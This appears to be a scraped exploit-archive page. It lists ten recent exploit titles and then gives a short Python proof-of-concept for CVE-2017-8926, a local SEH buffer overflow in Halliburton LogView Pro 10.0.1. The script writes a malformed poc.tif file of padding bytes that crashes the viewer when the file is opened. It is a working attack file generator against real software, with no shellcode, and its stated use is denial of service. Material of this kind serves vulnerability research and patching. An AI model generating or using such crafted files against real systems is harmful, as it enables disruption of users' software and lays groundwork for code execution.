7eac4c3a2c
10 new exploits Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH) Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH) Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit) PlaySms 1.4 - Remote Code Execution Mailcow 0.14 - Cross-Site Request Forgery Admidio 3.2.8 - Cross-Site Request Forgery
24 lines
842 B
Python
Executable file
24 lines
842 B
Python
Executable file
#!/usr/bin/python
|
|
# Exploit Title : Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)
|
|
# Date : 2017-05-14
|
|
# Exploit Author : Muhann4d
|
|
# CVE : CVE-2017-8926
|
|
# Vendor Homepage : http://www.halliburton.com
|
|
# Software Link : http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe
|
|
# Affected Versions : 10.0.1
|
|
# Category : Denial of Service (DoS) Local
|
|
# Tested on OS : Windows 7 Professional SP1 32bit
|
|
# Proof of Concept : run the exploit, open the poc.tif file with the Halliburton LogView Pro 10.0.1
|
|
|
|
# Vendor has been cantacted but no reply.
|
|
|
|
buf = "\x41" * 848
|
|
buff = "\x42" * 4
|
|
bufff = "\x43" * 4
|
|
buffff = "\x44" * 9999
|
|
f = open ("poc.tif", "w")
|
|
f.write(buf + buff + bufff + buffff)
|
|
f.close()
|
|
|
|
|
|
|